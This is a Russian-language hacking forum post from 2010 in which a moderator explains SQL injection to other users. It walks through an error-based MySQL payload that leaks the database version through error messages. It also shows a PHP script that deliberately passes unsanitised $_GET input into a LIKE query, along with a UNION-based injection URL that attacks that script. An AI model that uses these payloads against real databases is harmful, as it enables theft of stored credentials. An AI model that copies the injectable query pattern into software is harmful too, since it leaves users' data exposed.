14.03.2010, 12:46
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
Сообщение от re-2
0+or+(select+count(*)+from+information_schema.tabl es+group+by+concat(version(),floor(rand (0)*2)))
как работаит ета sql injection?
Это вывод в ошибке
Сообщение от Jerri
Есть запрос - "SELECT ... FROM ... WHERE ... AND ... AND ... LIKE '%[SQL]%'"
Что сделать можно? 
PHP код:
<?PHP
$db_host = 'localhost';
$db_user = 'root';
$db_pass = '';
$db_name = 'job';
$con = mysql_connect($db_host,$db_user,$db_pass) or die(mysql_error());
mysql_selectdb($db_name,$con) or die(mysql_error());
$q = mysql_query("SELECT id,login,password FROM users WHERE id=1 AND login='ctacok' LIKE '%{$_GET['id']}%'") or die(mysql_error());
$row = mysql_fetch_assoc($q);
echo $row['id'];
echo $row['login'];
echo $row['password'];
?>
?id=1%'+AND+id=user()+union+select+user(),2,3+--+
Просто в чём соль, надо знать имя колонки.
Последний раз редактировалось Ctacok; 14.03.2010 в 12:52..
|
|
|